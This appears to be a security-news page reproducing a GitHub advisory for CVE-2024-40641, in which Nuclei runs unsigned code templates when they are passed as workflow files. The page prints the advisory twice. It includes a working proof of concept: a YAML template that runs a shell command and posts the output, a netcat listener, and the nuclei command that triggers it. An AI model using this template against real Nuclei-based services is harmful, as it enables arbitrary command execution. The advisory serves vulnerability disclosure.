Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-c3q9-c27p-cw9h: projectdiscovery/nuclei allows unsigned code template execution through workflows

Summary

Find a way to execute code template without -code option and signature.

Details

write a code.yaml:

id: code

info:
  name: example code template
  author: ovi3


code:
  - engine:
      - sh
      - bash
    source: |
      id

http:
  - raw:
      - |
        POST /re HTTP/1.1
        Host: {{Hostname}}

        {{code_response}}

workflows:
  - matchers:
    - name: t

using nc to listen on 80:

nc -lvvnp 80

execute PoC template with nuclei:

./nuclei -disable-update-check  -w code.yaml -u http://127.0.0.1 -vv -debug

and nc will get id command output.

We use -w to specify a workflow file, not -t to template file. and notice there is a workflows field in code.yaml to pretend to be a workflow file.

Test in Linux and Nuclei v3.2.9

Impact

Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute)

ghsa
#web#linux#auth

Summary

Find a way to execute code template without -code option and signature.

Details

write a code.yaml:

id: code

info: name: example code template author: ovi3

code:

  • engine:
    • sh
    • bash source: | id http:
  • raw:
    • | POST /re HTTP/1.1 Host: {{Hostname}} {{code_response}} workflows:
  • matchers:
    • name: t

using nc to listen on 80:

execute PoC template with nuclei:

./nuclei -disable-update-check -w code.yaml -u http://127.0.0.1 -vv -debug

and nc will get id command output.

We use -w to specify a workflow file, not -t to template file. and notice there is a workflows field in code.yaml to pretend to be a workflow file.

Test in Linux and Nuclei v3.2.9

Impact

Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute)

References

  • GHSA-c3q9-c27p-cw9h
  • https://nvd.nist.gov/vuln/detail/CVE-2024-40641

ghsa: Latest News

GHSA-2r6g-7r83-jg72: `spam` project on PyPI compromised, malicious releases made